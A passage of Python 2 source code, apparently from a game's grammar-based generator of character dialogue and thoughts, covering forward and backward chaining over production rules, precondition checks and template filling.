print "Could not successfully forward chain from the targeted symbol {}\n*".format(symbol)
return None
if self.debug:
print "Successfully forward chained from targeted symbol {} all the way to terminal expansion '{}'".format(
symbol, symbol.expansion
)
# Forward chaining was successful, so now attempt backward chaining, unless the
# targeted symbol is a top-level symbol, in which case we can return the template
# we built by forward-chaining
if symbol.top_level:
if self.debug:
print "Targeted symbol {} is a top-level symbol, so we can skip backward chaining".format(symbol)
top_level_symbol_that_we_successfully_backward_chained_to = symbol
else:
if self.debug:
print "Now I will attempt to backward chain from the targeted symbol {}".format(symbol)
top_level_symbol_that_we_successfully_backward_chained_to = self._backward_chain_from_symbol(
symbol=symbol, state=state, rule_evaluation_metric=rule_evaluation_metric
)
if not top_level_symbol_that_we_successfully_backward_chained_to:
return None
complete_raw_template = self._retrace_backward_and_forward_chains_to_generate_a_complete_template(
start_symbol=top_level_symbol_that_we_successfully_backward_chained_to,
state=state, rule_evaluation_metric=rule_evaluation_metric
)
return complete_raw_template
def _forward_chain_from_symbol(self, symbol, state, n_tabs, rule_evaluation_metric, retracing_chains=False,
symbol_is_the_targeted_symbol=False):
"""Attempt to successfully terminally forward-chain from the given symbol, i.e.,
attempt to terminally expand a symbol.
If successful, this method will return a string constituting a partial dialogue
template pertaining to the portion of a prospective complete line of dialogue
that would include everything including and beyond the expansion of the targeted
symbol. If this method fails at any point, it will immediately return None.
"""
if self.debug:
print "{}Attempting to forward chain from symbol {}...".format(' '*n_tabs, symbol)
# First check for whether this symbol's preconditions are satisfied and whether
# the use of its expansion in a line of dialogue would cause a conversational
# violation to be incurred
if symbol.currently_violated(state=state):
return None
candidate_production_rules = symbol.forward_chaining_rules
# If one of these production rules is already known to be on a chain, we can just pick
# that one mindlessly, since we already know that's the route to go
try:
rule_on_our_chain = next(r for r in candidate_production_rules if r.viable)
return self._target_production_rule(
rule=rule_on_our_chain, state=state, rule_evaluation_metric=rule_evaluation_metric,
n_tabs=n_tabs+1, retracing_chains=retracing_chains
)
except StopIteration:
pass
# Sort the candidate production rules probabilistically by utilizing their application rates
candidate_production_rules = self._probabilistically_sort_production_rules(
rules=candidate_production_rules, rule_evaluation_metric=rule_evaluation_metric
)
# Iterate over these rules, attempting to utilize them successfully; return
# a template snippet if a rule may be utilized successfully
for production_rule in candidate_production_rules:
terminal_expansion_yielded_by_firing_that_production_rule = self._target_production_rule(
rule=production_rule, state=state, rule_evaluation_metric=rule_evaluation_metric,
n_tabs=n_tabs+1, retracing_chains=retracing_chains
)
if terminal_expansion_yielded_by_firing_that_production_rule:
# Save this successful terminal expansion of this symbol, in case we
# need it later (so that we don't reduplicate this completed effort)
symbol.expansion = terminal_expansion_yielded_by_firing_that_production_rule
# If the symbol we're forward chaining from is a top-level symbol and is
# the symbol that we are ultimately targeting, then save the production rule
# that allowed us to terminally expand it, since we'll need this information
# when we go back through the forward chain to collect all the mark-up of
# the symbols we expanded on the chain (for the LineOfDialogue object we
# end up instantiating to inherit)
if symbol.top_level and symbol_is_the_targeted_symbol:
if self.debug:
print "Added production rule {} to the chain".format(production_rule)
production_rule.viable = True
return terminal_expansion_yielded_by_firing_that_production_rule
# If we tried every production rule and failed to return a terminal expansion,
# then we must give up on this symbol by returning None
if self.debug:
print "Failed to forward chain from symbol {}".format(symbol)
return None
def _backward_chain_from_symbol(self, symbol, state, rule_evaluation_metric):
"""Attempt to successfully terminally backward-chain from the given symbol.
If successful, this method will return a string constituting a partial dialogue
template pertaining to the portion of a prospective complete line of dialogue
that would include everything up to the targeted symbol. If this method fails
at any point, it will immediately return None.
"""
if self.debug:
print "Attempting to backward chain from symbol {}...".format(symbol)
if symbol.top_level:
# Make sure this symbol doesn't violate any preconditions, since this hasn't
# been checked yet during backward chaining
if not symbol.currently_violated(state=state):
if self.debug:
print "Reached top-level symbol {}, so backward chaining is done".format(symbol)
return symbol
candidate_production_rules = symbol.backward_chaining_rules
# Sort the candidate production rules probabilistically by utilizing their application rates
candidate_production_rules = self._probabilistically_sort_production_rules(
rules=candidate_production_rules, rule_evaluation_metric=rule_evaluation_metric
)
for production_rule in candidate_production_rules:
this_production_rule_successfully_fired = (
self._target_production_rule(
rule=production_rule, state=state, rule_evaluation_metric=rule_evaluation_metric,
n_tabs=0
)
)
if this_production_rule_successfully_fired:
production_rule.viable = True
# Set breadcrumbs so that we can reconstruct our path if this backward chain
# is successful (by 'reconstruct our path', I mean fire all the production rules
# along our successful backward chain until we've generated a complete dialogue template)
top_level_symbol_we_successfully_chained_back_to = (
self._backward_chain_from_symbol(
production_rule.head, state=state, rule_evaluation_metric=rule_evaluation_metric
)
)
if top_level_symbol_we_successfully_chained_back_to:
if self.debug:
print "Added production rule {} to the chain".format(production_rule)
return top_level_symbol_we_successfully_chained_back_to
if self.debug:
print "Failed to backward chain from symbol {}".format(symbol)
return None
def _retrace_backward_and_forward_chains_to_generate_a_complete_template(self, start_symbol, state,
rule_evaluation_metric):
"""Retrace successfully terminal backward and forward chains to generate a complete dialogue template.
In this method, we traverse the production-rule chains that we have already successfully
discovered to generate a complete line of dialogue (and to accumulate all the mark-up that
it will inherit from the symbols that are expanded along these chains).
"""
self.symbols_expanded_to_produce_the_terminal_derivation = {start_symbol}
if self.debug:
print "Retraversing now from top-level symbol {}".format(start_symbol)
first_breadcrumb = next(rule for rule in start_symbol.production_rules if rule.viable)
return self._target_production_rule(
rule=first_breadcrumb, state=state, retracing_chains=True, rule_evaluation_metric=rule_evaluation_metric,
n_tabs=0
)
def _target_production_rule(self, rule, state, rule_evaluation_metric, n_tabs, retracing_chains=False):
"""Attempt to terminally expand this rule's head."""
if self.debug:
if rule.viable:
print "{}Retracing our chains via rule {}".format(' '*n_tabs, rule)
else:
print "{}Targeting production rule {}...".format(' '*n_tabs, rule)
terminally_expanded_symbols_in_this_rule_body = []
for symbol in rule.body:
if type(symbol) == unicode: # Terminal symbol (no need to expand)
terminally_expanded_symbols_in_this_rule_body.append(symbol)
elif symbol.expansion and not retracing_chains:
# Nonterminal symbol that we already successfully expanded earlier
return symbol.expansion
else: # Nonterminal symbol that we have not yet successfully expanded
terminal_expansion_of_that_symbol = self._forward_chain_from_symbol(
symbol=symbol, state=state, retracing_chains=retracing_chains,
rule_evaluation_metric=rule_evaluation_metric, n_tabs=n_tabs+1
)
if terminal_expansion_of_that_symbol:
if retracing_chains:
self.symbols_expanded_to_produce_the_terminal_derivation.add(symbol)
if self.debug:
print "{}Traversed through symbol {}".format(' '*n_tabs, symbol)
terminally_expanded_symbols_in_this_rule_body.append(terminal_expansion_of_that_symbol)
else:
if self.debug:
print "{}Abandoning production rule {}".format(' '*n_tabs, rule)
return None
# You successfully expanded all the symbols in this rule body
rule.viable = True
expansion_yielded_by_this_rule = ''.join(terminally_expanded_symbols_in_this_rule_body)
return expansion_yielded_by_this_rule
def _probabilistically_sort_production_rules(self, rules, rule_evaluation_metric):
"""Sort a collection of production rules probabilistically by utilizing their application rates.
Because the application rates of a group of rules are only relative to one another
if those rules have the same head (which is not a guarantee when backward chaining),
we need to probabilistically sort rules within rule-head groups first, and then we really
have no viable option except randomly shuffling the head groups (while retaining the
probabilistically determined orderings within each head group)
"""
# Now produce a probabilistic sorting of all remaining rules
probabilistic_sort = []
# Assemble all the rule heads
rule_heads = list({rule.head for rule in rules})
# Randomly shuffle the rule heads (we have no way deciding how to order the
# rule-head groups, since the application rates of rules in different groups
# only mean anything relative to the other rules in that same group, not to
# rules in other groups)
random.shuffle(rule_heads)
# Probabilistically sort each head group
for head in rule_heads:
rules_sharing_this_head = [rule for rule in rules if rule.head is head]
probabilistic_sort_of_this_head_group = self._probabilistically_sort_a_rule_head_group(
rules=rules_sharing_this_head, rule_evaluation_metric=rule_evaluation_metric
)
probabilistic_sort += probabilistic_sort_of_this_head_group
return probabilistic_sort
def _probabilistically_sort_a_rule_head_group(self, rules, rule_evaluation_metric):
"""Probabilistically sort a collection of production rules that share the same rule head.
This method works by fitting a probability range to each of the given set of rules, rolling
a random number and selecting the rule whose range it falls within, and then repeating this
on the set of remaining rules, and so forth until every rule has been selecting.
"""
# Now, probabilistically sort all rules that are currently executable
probabilistic_sort = []
remaining_rules = list(rules)
while len(remaining_rules) > 1:
probability_ranges = self._fit_probability_distribution_to_rules_according_to_an_evaluation_metric(
rules=remaining_rules, rule_evaluation_metric=rule_evaluation_metric
)
x = random.random()
probabilistically_selected_rule = next(
rule for rule in remaining_rules if probability_ranges[rule][0] <= x <= probability_ranges[rule][1]
)
probabilistic_sort.append(probabilistically_selected_rule)
remaining_rules.remove(probabilistically_selected_rule)
# Add the only rule that's left (no need to fit a probability distribution to
# this set containing just one rule)
last_one_to_be_selected = remaining_rules[0]
probabilistic_sort.append(last_one_to_be_selected)
return probabilistic_sort
@staticmethod
def _fit_probability_distribution_to_rules_according_to_an_evaluation_metric(rules, rule_evaluation_metric):
"""Return a dictionary mapping each of the rules to a probability range.
@param rules: The rules that this method will fit a probability distribution to.
"""
# Determine the individual probabilities of each production rule, given our
# rule evaluation metric
individual_probabilities = {}
sum_of_all_scores = float(sum(rule_evaluation_metric(rule) for rule in rules))
for rule in rules:
probability = rule_evaluation_metric(rule)/sum_of_all_scores
individual_probabilities[rule] = probability
# Use those individual probabilities to associate each production rule with a specific
# probability range, such that generating a random value between 0.0 and 1.0 will fall
# into one and only one production rule's probability range
probability_ranges = {}
current_bound = 0.0
for rule in rules:
probability = individual_probabilities[rule]
probability_range_for_this_rule = (current_bound, current_bound+probability)
probability_ranges[rule] = probability_range_for_this_rule
current_bound += probability
# Make sure the last bound indeed extends to 1.0 (necessary because of
# float rounding issues)
last_rule_to_have_a_range_attributed = rules[-1]
probability_ranges[last_rule_to_have_a_range_attributed] = (
probability_ranges[last_rule_to_have_a_range_attributed][0], 1.0
)
return probability_ranges
def _reset_temporary_attributes(self):
"""Clear all temporary symbol and rule attributes that we set during this generation session."""
for symbol in self.nonterminal_symbols:
symbol.expansion = None
for rule in symbol.production_rules:
rule.viable = False
self.symbols_expanded_to_produce_the_terminal_derivation = set()
def find_symbol(self, symbol_name):
"""Return a symbol with the given name."""
try:
return next(s for s in self.nonterminal_symbols if s.tag == symbol_name)
except StopIteration:
print "I could not find a symbol with that name."
class NonterminalSymbol(object):
"""A symbol in a production system for in-game dialogue generation."""
def __init__(self, tag, top_level, raw_markup, production_rules_specification):
"""Initialize a NonterminalSymbol object."""
self.tag = tag
# If a terminal expansion of this symbol constitutes a complete line of dialogue, then
# this is a top-level symbol
self.top_level = top_level
# Reify production rules for expanding this symbol
self.production_rules = self._init_reify_production_rules(production_rules_specification)
# Prepare annotation sets that will be populated (as appropriate) by _init_parse_markup()
self.preconditions = set()
# These attributes are used to perform live generation of a dialogue template from the
# grammar specification, which is done using backward-chaining and forward-chaining
# to check for precondition violations and other preclusions; they get set by
# Productionist._init_attribute_backward_chaining_and_forward_chaining_rules_to_symbols()
self.backward_chaining_rules = []
self.forward_chaining_rules = []
# This attribute will hold the successful expansion of this symbol during a
# generation procedure; we keep track of this so as to not reduplicate expansion
# efforts while we are firing production rules during backward- and forward-chaining,
# which could happen if two rules have the same symbol in their rule bodies
self.expansion = None
# Parse markup
self._init_parse_markup(raw_markup=raw_markup)
def __str__(self):
"""Return string representation."""
return '[[{tag}]]'.format(tag=self.tag)
def _init_reify_production_rules(self, production_rules_specification):
"""Instantiate ProductionRule objects for the rules specified in production_rules_specification."""
production_rule_objects = []
for rule_specification in production_rules_specification:
body = rule_specification['expansion']
application_rate = rule_specification['app_rate']
production_rule_objects.append(
ProductionRule(head=self, body_specification=body, application_rate=application_rate)
)
return production_rule_objects
def _init_parse_markup(self, raw_markup):
"""This method gets overwritten by subclasses to this class."""
pass
class ProductionRule(object):
"""A production rule in a production system for in-game dialogue generation."""
def __init__(self, head, body_specification, application_rate):
"""Initialize a ProductionRule object.
'head' is a nonterminal symbol constituting the left-hand side of this rule, while
'body' is a sequence of symbols that this rule may be used to expand the head into.
"""
self.head = head
self.body = None # Gets set by Productionist._init_resolve_symbol_references_in_a_rule_body()
self.body_specification = body_specification
self.body_specification_str = ''.join(body_specification)
self.application_rate = application_rate
# This attribute will mark whether this production rule successfully fired during the
# backward-chaining routine of a generation procedure; we keep track of this because
# after we have successfully terminally backward-chained and forward-chained, we need
# to remember the rules on those chains in order to construct the final dialogue template
self.viable = False
def __str__(self):
"""Return string representation."""
return '{} --> {}'.format(self.head, self.body_specification_str)
class Condition(object):
"""A condition super class that is inherited from by Precondition and ViolationCondition."""
def __init__(self, condition):
"""Initialize a Condition object."""
self.condition = condition
self.test = eval(condition) # The condition is literally a lambda function
self.arguments = self._init_parse_condition_for_its_arguments(condition=condition)
@staticmethod
def _init_parse_condition_for_its_arguments(condition):
"""Parse this condition's specification (a lambda function) to gather the arguments that it requires."""
index_of_end_of_arguments = condition.index(':')
arguments = condition[:index_of_end_of_arguments]
arguments = arguments[len('lambda '):] # Excise 'lambda ' prefix
arguments = arguments.split(', ')
return arguments
def evaluate(self, state):
"""Evaluate this condition given the state of the world at the beginning of a conversation turn."""
# Use duck typing to check for whether this state capsule is a Conversation
# object (in the case of dialogue generation) or a Person object (in the case
# of thought generation)
if state.__class__.__name__ is 'Conversation':
# If the current speaker is a human player, don't even worry about
# evaluating preconditions, i.e., let them say whatever
if state.speaker.player:
return True
# Instantiate all the arguments we might need as local variables
conversation = state
speaker = state.speaker
interlocutor = state.interlocutor
subject = state.subject.matches[state.speaker]
elif state.__class__.__name__ in ('Person', 'PersonExNihilo'):
thinker = state
# Prepare the list of arguments by evaluating to bind them to the needed local variables
realized_arguments = [eval(argument) for argument in self.arguments]
# Return a boolean indicating whether this precondition is satisfied
try:
return self.test(*realized_arguments)
except (ValueError, AttributeError):
raise Exception('Cannot evaluate the precondition {}'.format(self.condition))
class Precondition(Condition):
"""A precondition for expanding a symbol to generate a line of dialogue."""
def __init__(self, tag):
"""Initialize a Precondition object."""
super(Precondition, self).__init__(condition=tag)
def __str__(self):
"""Return a string specifying the lambda function itself."""
return self.condition
class StaticElement(object):
"""A static element in a templated terminal derivation."""
def __init__(self, text):
"""Initialize a StaticElement object."""
self.text = text
def __str__(self):
"""Return the text of this static element."""
return self.text
def realize(self, state):
"""Realize a StaticElement object simply by returning its text."""
return self.text
class Gap(object):
"""A gap in a templated terminal derivation."""
def __init__(self, specification):
"""Initialize a Gap object."""
self.specification = specification
def __str__(self):
"""Return the specification for filling in this gap."""
return self.specification
def realize(self, state):
"""Fill in this gap according to the world state during a conversation turn."""
# Use duck typing to check for whether this state capsule is a ConversationTurn
# object (in the case of dialogue generation) or a Person object (in the case
# of thought generation); then prepare local variables that will allow us to
# fill in this gap
if state.__class__.__name__ is 'Conversation':
conversation, speaker, interlocutor, subject = (
state,
state.speaker, state.interlocutor,
state.subject.matches[state.speaker]
)
elif state.__class__.__name__ in ('Person', 'PersonExNihilo'):
thinker = state
return str(eval(self.specification))
class DialogueGenerator(Productionist):
"""A subclass to Productionist that handles dialogue-specific concerns.
For instance, this class affords the targeting of a generated line performing a
specific dialogue move or addressing a specific topic of conversation.
"""
def __init__(self, game):
"""Initialize a DialogueGenerator object."""
super(DialogueGenerator, self).__init__(game)
def target_dialogue_move(self, conversation, move_name):
"""Attempt to generate a line of dialogue that performs a dialogue move with the given name."""
# Attempt to produce a raw derivation with the desired markup, i.e., that
# it performs the given dialogue move
raw_derivation_built_by_targeting_this_symbol = self.target_markup(
markup_lambda_expression=lambda symbol: move_name in symbol.moves,
symbol_sort_evaluation_function=lambda symbol: random.random(),
state=conversation, rule_evaluation_metric=lambda rule: rule.application_rate
)
# Reify the template as a LineOfDialogue object and return that
line_of_dialogue_object = LineOfDialogue(
raw_template=raw_derivation_built_by_targeting_this_symbol,
symbols_expanded_to_produce_this_template=self.symbols_expanded_to_produce_the_terminal_derivation,
conversation=conversation
)
# Reset any temporary attributes that we utilized during this generation procedure
self._reset_temporary_attributes()
return line_of_dialogue_object
def target_topics_of_conversation(self, conversation, topic_names):
"""Attempt to generate a line of dialogue that addresses a topic with the given name.
@param conversation: The conversation in which the requested generated line will be delivered.
@param topic_names: A set of names of topics of conversation, at least one which the requested
generated line should address.
"""
# Attempt to produce a raw derivation with the desired markup, i.e., that
# it performs the given dialogue move
raw_derivation_built_by_targeting_this_symbol = self.target_markup(
markup_lambda_expression=lambda symbol: topic_names & symbol.topics_addressed,
symbol_sort_evaluation_function=lambda symbol: random.random(),
state=conversation, rule_evaluation_metric=lambda rule: rule.application_rate
)
# Reify the template as a LineOfDialogue object and return that
line_of_dialogue_object = LineOfDialogue(
raw_template=raw_derivation_built_by_targeting_this_symbol,
symbols_expanded_to_produce_this_template=self.symbols_expanded_to_produce_the_terminal_derivation,
conversation=conversation
)
# Reset any temporary attributes that we utilized during this generation procedure
self._reset_temporary_attributes()
return line_of_dialogue_object
class DialogueNonterminalSymbol(NonterminalSymbol):
"""A subclass of NonterminalSymbol that pertains specifically to dialogue concerns."""
def __init__(self, tag, top_level, raw_markup, production_rules_specification):
"""Initialize a DialogueNonterminalSymbol object."""
self.conditional_violations = set()
self.propositions = set()
self.moves = set() # The dialogue moves constituted by the delivery of this line
self.speaker_obligations_pushed = set() # Line asserts speaker conversational obligations
self.interlocutor_obligations_pushed = set() # Line asserts interlocutor conversational obligations
self.topics_pushed = set() # Line introduces a new topic of conversation
self.topics_addressed = set() # Line addresses a topic of conversation
self.clear_subject_of_conversation = False # Line clears subject of conversation to allow asserting a new one
self.force_speaker_subject_match_to_speaker_preoccupation = False # Line forces a speaker subject match
self.context_updates = set() # Line updates the conversational context, e.g., w.r.t. subject of conversation
super(DialogueNonterminalSymbol, self).__init__(tag, top_level, raw_markup, production_rules_specification)
def _init_parse_markup(self, raw_markup):
"""Instantiate and attribute objects for the annotations attributed to this symbol."""
for tagset in raw_markup:
for tag in raw_markup[tagset]:
if tagset == "Preconditions":
self.preconditions.add(Precondition(tag=tag))
elif tagset == "ViolationConditions":
self.conditional_violations.add(ConditionalViolation(tag=tag))
elif tagset == "Propositions":
self.propositions.add(tag)
# Acts, goals, obligations, and topics are reified as objects during a conversation, but
# here are only represented as a tag
elif tagset == "Moves":
self.moves.add(tag)
elif tagset == "PushObligation": # Obligations pushed onto interlocutor
self.interlocutor_obligations_pushed.add(tag)
elif tagset == "PushSpeakerObligation": # Obligations pushed onto speaker (by their own line)
self.speaker_obligations_pushed.add(tag)
elif tagset == "PushTopic":
self.topics_pushed.add(tag)
elif tagset == "AddressTopic":
self.topics_addressed.add(tag)
elif tagset == "Context":
if tag == "CLEAR SUBJECT":
self.clear_subject_of_conversation = True
if tag == "FORCE SPEAKER SUBJECT MATCH TO SPEAKER PREOCCUPATION":
self.force_speaker_subject_match_to_speaker_preoccupation = True
elif tag:
self.context_updates.add(tag)
elif tagset == "EffectConditions":
pass # TODO
elif tagset == "ChangeSubjectTo":
pass # TODO REMOVE THIS TAGSET
elif tagset == "UserStudyQueryArguments":
pass # This one is currently only used for producing training data
else:
raise Exception('Unknown tagset encountered: {}'.format(tagset))
@property
def all_markup(self):
"""Return all the annotations attributed to this symbol."""
all_markup = (
self.preconditions | self.conditional_violations | self.propositions |
self.context_updates | self.moves | self.speaker_obligations_pushed |
self.interlocutor_obligations_pushed | self.topics_pushed | self.topics_addressed
)
return list(all_markup)
def currently_violated(self, state):
"""Return whether this symbol is currently violated, i.e., whether it has an unsatisfied
precondition or would incur a conversational violation if deployed at this time."""
if state.speaker.player: # Let the player say anything currently, i.e., return False
return False
if (self.conversational_violations(conversation=state) or
not self.preconditions_satisfied(conversation=state)):
if state.productionist.debug:
# Express why the symbol is currently violated
print "Symbol {} is currently violated".format(self)
conversational_violations = self.conversational_violations(conversation=state)
for conversational_violation in conversational_violations:
print '\t{}'.format(conversational_violation)
unsatisfied_preconditions = (
p for p in self.preconditions if p.evaluate(state=state) is False
)
for unsatisfied_precondition in unsatisfied_preconditions:
print '\t{}'.format(unsatisfied_precondition)
return True
# Symbol is not currently violated, so return False
return False
def preconditions_satisfied(self, conversation):
"""Return whether this line's preconditions are satisfied given the state of the world."""
return all(precondition.evaluate(state=conversation) for precondition in self.preconditions)
def conversational_violations(self, conversation):
"""Return a list of names of conversational violations that will be incurred if this line is deployed now."""
violations_incurred = [
potential_violation.name for potential_violation in self.conditional_violations if
potential_violation.evaluate(state=conversation)
]
return violations_incurred
class LineOfDialogue(object):
"""A line of dialogue that may be used during a conversation."""
def __init__(self, raw_template, symbols_expanded_to_produce_this_template, conversation):
"""Initialize a LineOfDialogue object."""
self.raw_template = raw_template
self.nonterminal_symbols = symbols_expanded_to_produce_this_template
self.template = self._init_prepare_template(raw_line=raw_template)
# Prepare annotation attributes
self.conversational_violations = set()
self.propositions = set()
self.moves = set() # The dialogue moves constituted by the delivery of this line
self.speaker_obligations_pushed = set() # Line asserts speaker conversational obligations
self.interlocutor_obligations_pushed = set() # Line asserts interlocutor conversational obligations
self.topics_pushed = set() # Line introduces a new topic of conversation
self.topics_addressed = set() # Line addresses a topic of conversation
self.clear_subject_of_conversation = False # Line clears subject of conversation to allow asserting a new one
self.force_speaker_subject_match_to_speaker_preoccupation = False # Line forces a speaker subject match
self.context_updates = set() # Line updates the conversational context, e.g., the subject of conversation
self._init_inherit_markup(conversation=conversation)
def __str__(self):
"""Return the raw template characterizing this line of dialogue."""
return self.raw_template
@staticmethod
def _init_prepare_template(raw_line):
"""Prepare a templated line of dialogue from a raw specification for one.
The template returned by this method will specifically be an ordered list
of StaticElement and Gap objects, the latter of which will be filled in
according to
"""
template = [] # An ordered list of StaticElements and Gaps
while '[' in raw_line:
index_of_opening_bracket = raw_line.index('[')
# Process next static element
next_static_element = raw_line[:index_of_opening_bracket]
if next_static_element:
template.append(StaticElement(text=next_static_element))
# Process next gap
index_of_closing_bracket = raw_line.index(']')
next_gap = raw_line[index_of_opening_bracket+1:index_of_closing_bracket]
template.append(Gap(specification=next_gap))
# Excise the processed elements
raw_line = raw_line[index_of_closing_bracket+1:]
# Process the trailing static element, if any
if raw_line:
template.append(StaticElement(text=raw_line))
return template
def _init_inherit_markup(self, conversation):
"""Inherit the mark-up of all the symbols that were expanded in the construction of this dialogue template."""
for symbol in self.nonterminal_symbols:
self.conversational_violations |= set(symbol.conversational_violations(conversation=conversation))
self.propositions |= symbol.propositions
self.moves |= symbol.moves
self.speaker_obligations_pushed |= symbol.speaker_obligations_pushed
self.interlocutor_obligations_pushed |= symbol.interlocutor_obligations_pushed
self.topics_pushed |= symbol.topics_pushed
self.topics_addressed |= symbol.topics_addressed
self.clear_subject_of_conversation = symbol.clear_subject_of_conversation
self.force_speaker_subject_match_to_speaker_preoccupation = (
symbol.force_speaker_subject_match_to_speaker_preoccupation
)
self.context_updates |= symbol.context_updates
def realize(self, conversation):
"""Return a filled-in template according to the world state during the current conversation turn."""
return ''.join(element.realize(state=conversation) for element in self.template)
class ConditionalViolation(Condition):
"""A conversational violation that may be incurred, pending the evaluation of its conditions,
if a symbol is expanded to generate a line of dialogue.
"""
def __init__(self, tag):
"""Initialize a ConditionalViolation object."""
self.name, condition = tag.split('<--')
super(ConditionalViolation, self).__init__(condition=condition)
def __str__(self):
"""Return string representation."""
return '{} <-- {}'.format(self.name, self.condition)
###################
# THOUGHT CLASSES #
###################
class ThoughtGenerator(Productionist):
"""A subclass to Productionist that handles thought-specific concerns.
For instance, this class affords the targeting of a generated thought that is elicited
by a set of symbol stimuli encountered by a character going about the world.
"""
def __init__(self, game):
"""Initialize a ThoughtGenerator object."""
# These are set as needed by target_association() to hold temporary information
self.thinker = None
self.stimuli = {}
self.nonrepeatable_symbols = set()
super(ThoughtGenerator, self).__init__(game)
def target_association(self, thinker, stimuli):
"""Attempt to generate a line of dialogue that performs a dialogue move with the given name."""
if self.debug:
print "Attempting to elicit thought given the stimuli: {stimuli}...".format(
stimuli=', '.join("{signal} ({strength})".format(
signal=signal, strength=strength) for signal, strength in stimuli.iteritems()
)
)
self.thinker = thinker
self.stimuli = stimuli
self.nonrepeatable_symbols = self._collect_nonrepeatable_symbols()
markup_lambda_expression = (
lambda symbol: {pair[0] for pair in symbol.signals} & {pair[0] for pair in self.stimuli.iteritems()}
)
# Attempt to produce a raw derivation with the desired markup, i.e., one that has
# a good matching between the symbols associated with it and the stimuli (i.e., the
# weighted_symbol_set)
raw_derivation_built_by_targeting_this_symbol = self.target_markup(
markup_lambda_expression=markup_lambda_expression,
symbol_sort_evaluation_function=self.evaluate_nonterminal_symbol,
state=thinker,
rule_evaluation_metric=self.evaluate_production_rule
)
# Reify the template as a Thought object and return that
thought_object = Thought(
raw_template=raw_derivation_built_by_targeting_this_symbol,
symbols_expanded_to_produce_this_template=self.symbols_expanded_to_produce_the_terminal_derivation,
thinker=thinker
)
# Reset any temporary attributes that we utilized during this generation procedure
self._reset_temporary_attributes()
return thought_object
def _collect_nonrepeatable_symbols(self):
"""Collect all nonterminal symbols that cannot be expanded during this generation instance (because
that would produce awkward repetition.
"""
nonrepeatable_symbols_recently_expanded_by_thinker = set()
for recent_thought in self.thinker.mind.recent_thoughts:
for symbol in recent_thought.nonterminal_symbols:
if symbol.nonrepeatable:
nonrepeatable_symbols_recently_expanded_by_thinker.add(symbol)
return nonrepeatable_symbols_recently_expanded_by_thinker
def evaluate_nonterminal_symbol(self, nonterminal_symbol):
"""Score a nonterminal symbol for the strength of its association with a set of stimuli."""
config = self.game.config
score = 0
for stimulus_signal, stimulus_signal_weight in self.stimuli.iteritems():
for symbol_signal, _ in nonterminal_symbol.signals: # _ stands for symbol_signal_weight (now ignored)
# Reward for matching signals (commensurately to the weight for that
# signal that is packaged up in the stimuli)
if stimulus_signal == symbol_signal:
score += stimulus_signal_weight
# Penalize for symbol having already been expanded by this person to
# produce a recent thought
if nonterminal_symbol in self.nonrepeatable_symbols:
score *= config.penalty_multiplier_for_expanding_nonrepeatable_symbol_in_thought
return score
def evaluate_production_rule(self, rule):
"""Score a production rule for the strength of its association with a set of stimuli."""
# Determine the score according to the associational strength of the symbols in its body
score = sum(0 if type(s) is unicode else self.evaluate_nonterminal_symbol(s) for s in rule.body)
# Increment the score according to the rule's application rate (multiplied by the
# corresponding score multiplier specified in config)
application_rate_multiplier = self.game.config.application_rate_multiplier_scoring_boost
score += rule.application_rate * application_rate_multiplier
return score
class ThoughtNonterminalSymbol(NonterminalSymbol):
"""A subclass of NonterminalSymbol that pertains specifically to thought concerns."""
def __init__(self, tag, top_level, raw_markup, production_rules_specification):
"""Initialize a DialogueNonterminalSymbol object."""
self.signals = [] # A list of (signal, weight) tuples
self.effects = set()
self.nonrepeatable = False # Whether a penalty should be incurred for repeatedly expanding this symbol
super(ThoughtNonterminalSymbol, self).__init__(tag, top_level, raw_markup, production_rules_specification)
def _init_parse_markup(self, raw_markup):
"""Instantiate and attribute objects for the annotations attributed to this symbol."""
for tagset in raw_markup:
for tag in raw_markup[tagset]:
if tagset == "Preconditions":
self.preconditions.add(Precondition(tag=tag))
elif tagset == "Signals":
symbol_and_weight = tag.split()
symbol = ' '.join(symbol_and_weight[:-1])
weight = symbol_and_weight[-1]
weight = float(weight)
symbol_weight_tuple = (symbol, weight)
self.signals.append(symbol_weight_tuple)
elif tagset == "Effects":
self.effects.add(tag)
elif tagset == "nonrepeatable":
self.nonrepeatable = eval(tag)
else:
raise Exception('Unknown tagset encountered: {}'.format(tagset))
# KLUDGE 06-02-2016: IF COLON IS IN A SYMBOL'S NAME (E.G., 'do depart : i hate this town'),
# INFER IT BEING NONREPEATABLE
if ':' in self.tag:
self.nonrepeatable = True
@property
def all_markup(self):
"""Return all the annotations attributed to this symbol."""
all_markup = self.preconditions | self.signals | self.effects
return list(all_markup)
def currently_violated(self, state):
"""Return whether this symbol is currently violated, i.e., whether it has an unsatisfied
precondition or would incur a conversational violation if deployed at this time."""
return not self.preconditions_satisfied(thinker=state)
def preconditions_satisfied(self, thinker):
"""Return whether this line's preconditions are satisfied given the state of the world."""
return all(precondition.evaluate(state=thinker) for precondition in self.preconditions)
class Thought(object):
"""A thought that may enter the mind of a character."""
def __init__(self, raw_template, symbols_expanded_to_produce_this_template, thinker):
"""Initialize a Thought object."""
self.thinker = thinker
self.raw_template = raw_template
self.nonterminal_symbols = symbols_expanded_to_produce_this_template
self.template = self._init_prepare_template(raw_line=raw_template)
# Prepare annotation attributes
self.signals = {} # A dictionary mapping signal names to their strengths
self.effects = set()
self._init_inherit_markup()
def __str__(self):
"""Return string representation."""
return 'A thought ("{raw_template}"), produced in the mind of {owner}'.format(
raw_template=self.raw_template,
owner=self.thinker.name,
# date=self.thinker.game.date[0].lower() + self.thinker.game.date[1:]
)
@staticmethod
def _init_prepare_template(raw_line):
"""Prepare a templated line of dialogue from a raw specification for one.
The template returned by this method will specifically be an ordered list
of StaticElement and Gap objects, the latter of which will be filled in
according to
"""
template = [] # An ordered list of StaticElements and Gaps
while '[' in raw_line:
index_of_opening_bracket = raw_line.index('[')
# Process next static element
next_static_element = raw_line[:index_of_opening_bracket]
if next_static_element:
template.append(StaticElement(text=next_static_element))
# Process next gap
index_of_closing_bracket = raw_line.index(']')
next_gap = raw_line[index_of_opening_bracket+1:index_of_closing_bracket]
template.append(Gap(specification=next_gap))
# Excise the processed elements
raw_line = raw_line[index_of_closing_bracket+1:]
# Process the trailing static element, if any
if raw_line:
template.append(StaticElement(text=raw_line))
return template
def _init_inherit_markup(self):
"""Inherit the mark-up of all the symbols that were expanded in the construction of this dialogue template."""
config = self.thinker.game.config
for symbol in self.nonterminal_symbols:
self.effects |= symbol.effects
for signal, strength in symbol.signals:
signal = self.evaluate_runtime_signal(signal=signal)
if signal not in self.signals:
self.signals[signal] = 0
self.signals[signal] += config.strength_increase_to_thought_signal_for_nonterminal_signal_annotation
